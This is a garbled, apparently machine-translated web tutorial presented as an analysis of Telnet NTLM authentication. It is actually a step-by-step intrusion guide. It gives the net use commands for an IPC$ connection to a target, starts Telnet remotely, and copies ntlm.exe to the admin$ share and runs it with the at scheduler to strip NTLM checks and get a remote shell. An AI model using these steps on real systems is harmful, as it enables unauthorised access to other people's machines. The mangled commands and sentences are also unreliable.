Telnet AUTHENTICATION System Analysis

Telnet AUTHENTICATION is also called NTLM authentication. It is a verification system that Microsoft uses to ensure Telnet login security. How can this function be implemented? Here we will introduce it in detail. Because Telnet is powerful and one of the most frequently used logon methods by intruders, Microsoft has added a Telnet AUTHENTICATION system called NTLM verification, it requires that the Telnet terminal not only have the username and password of the Telnet service host, but also meet the NTLM authentication relationship. NTLM verification greatly enhances the security of the Telnet host, just like blocking a lot of intruders. I have written a special post about NTLM. you can check it out)

Telnet AUTHENTICATION 1. Use Telnet to connect to the host

Command Format cmd): Telnet 192.168.0.0 connection port number

If you want to disconnect, It is exit.

Telnet AUTHENTICATION 2. Typical Telnet intrusion strategy

Step 1: Establish an IPC $ connection

Step 2: Enable the remote Telnet connection. First, confirm in cmd that the root directory is the target.) enter the command. service to open the service project. look for it carefully. there is a Telnet service item. open it.

Step 3: cancel the IPC $ connection: net use 192.168.0.0/del

Step 4: Remove NTLM verification. If NTLM verification on the target is not removed, it will fail when you log on to the target computer.

In fact, there are many methods. Let's introduce the most commonly used one. It's also the simplest method.

First, create the same account and password as the remote host on the local computer.

Command: net localgroup alpha/add. However, make sure that the account of the other party is alpha, because it must be the same.

Step 2: Go to "start" → "program" → "attachment" to find "command prompt", right-click "command prompt", and select "properties ".

Select "Run U as another user. click. "OK" and then. still follow the path above to find the "command prompt" (cmd ). then open it with Zuo Jian.

Enter the user name and password. alpha

Click OK to get the cmd shell box.

Then enter our command: Telnet 192.168.0.0

Now an updated cmd shell will be displayed. This shell is on 192.168.0.0.

In fact, there are many ways to remove Telnet AUTHENTICATION. I will introduce you to another method.

The token is uploaded to a machine for execution. port 3389 on that machine is automatically enabled.

The concept of ntlm.exeand 3389.exeare similar. Some users want to upload our ntlm.exe to the machine 192.168.0.0.

First, open cmd.

Then enter the command: net use \ 192.168.0.0 \ ipc $ * "\ user: administrator

Then enter the command copy c: \ NTLM.exe \ 192.168.0.0 \ admin $

\ Admin $ is the permission shared by the admin user on the host 192.168.0.0.

Then enter the view time command: net time \ 192.168.0.0

Let's assume that the time for the other party is 03:21 P.M.

Then enter the execution command: at \ 192.168.0.0 NTLM.exe

Explanation: 03:22 P.M. AM to Am from AM. When cmd shell enters the command, it must be written for 24 hours.

Then press enter to confirm.
Or after the prompt for the successful completion of the command, wait for 1 minute. Let the cmd complete our shell command.

Then, run Telnet 192.168.0.0.

OK. You are done.

To restore Telnet AUTHENTICATION, we need a shell tool: resumeTelnet.exe.

ResumeTelnet.exe uses this method.

Command Format: ResumeTelnet.exe \\\ server name password

The server name can be the host domain name or IP address. Let's write 192.168.0.0

Password is the password.

Press enter to confirm. When the command completed successfully is displayed, everything is complete.